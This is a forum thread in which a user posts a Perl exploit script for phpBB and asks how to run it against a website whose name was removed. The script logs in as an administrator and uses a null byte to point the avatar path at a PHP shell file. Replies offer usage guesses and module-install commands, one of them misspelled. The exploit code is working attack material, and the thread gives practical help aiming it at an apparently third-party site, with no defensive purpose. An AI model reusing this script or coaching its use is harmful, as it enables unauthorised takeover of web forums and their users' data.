Some help with Perl Script

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Some help with Perl Script

Post by insomaniacal on Sun Jun 21, 2009 8:31 pm
([msg=25713]see Some help with Perl Script[/msg])

So, I found this exploit written in Perl, and having very little knowledge with Perl (Okay, none), I'm having some trouble setting it up. Could any of you know look at this and tell me which parts would have to be filled in, and with what. Here is the exploit:

Code: Select all
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}


<-- If you're wondering, I got it from here --> http://milw0rm.org/exploits/2348

I know that I should fill in the $url with the target website, the username and password with that (a username/password). However, several lines, like "&login=1" confuse me. Do I need to do edit this in some way. If I do what I already stated, I get this output in the terminal.

Code: Select all
USE:
./phpbb.pl [websitenameremoved]/forum/ admin pass images/avatars/shell.php [d(DEBUG)]


This happens to be the first line of code that is executed, so is there anything to edit here? I'm quite new to remote exploits like this one, so I'd appreciate some help. Thanks !
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1210
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Re: Some help with Perl Script

Post by BhaaL on Mon Jun 22, 2009 11:22 am
([msg=25740]see Re: Some help with Perl Script[/msg])

Exploits from milw0rm are usually ready-to-use.
If you fail to read the instructions, you're better off not using them at all.
BhaaL
Poster
Poster
 
Posts: 270
Joined: Sun Apr 13, 2008 11:16 am
Blog: View Blog (0)


Re: Some help with Perl Script

Post by insomaniacal on Tue Jun 23, 2009 2:02 pm
([msg=25820]see Re: Some help with Perl Script[/msg])

I've read the instructions there, which are really nonexistent, they only tell you what the script is capable of doing, and I already knew about that. :)

Any other help? I haven't really been "at it" lately since I just recently got internet (the hotel I'm at had some hardware failure, or so they say, the past two days). Any thoughts, random ideas, or places to look would be helpful.
It's not who votes that counts, it's who counts the votes
insomaniacal.blog.com
User avatar
insomaniacal
Addict
Addict
 
Posts: 1210
Joined: Sun May 24, 2009 10:21 am
Blog: View Blog (0)


Re: Some help with Perl Script

Post by fashizzlepop on Wed Dec 30, 2009 4:29 am
([msg=32330]see Re: Some help with Perl Script[/msg])

From a first quick look I'm thinking you have to have an account under a phpBB forum system and when you do, you will run the script as so:
Code: Select all
perl exploit.plx phpBBbasedforums.com username password


I'm thinking there is supposed to be a 4th argument to add in after password but I'm not sure what it is or if it is needed.

This could be completely wrong. For the record, you will need perl installed along with the modules listed at the top like: HTTP::Cookies, LWP, and URI::Escape

Code: Select all
cpan HTTP:Cookies


Disclaimer, I am very new to Perl and really am only guessing at this, and for all I know those modules might be already installed in a normal installation of Perl. Let me know how it goes.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.
User avatar
fashizzlepop
Developer
Developer
 
Posts: 2304
Joined: Sat May 24, 2008 1:20 pm
Blog: View Blog (0)



Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests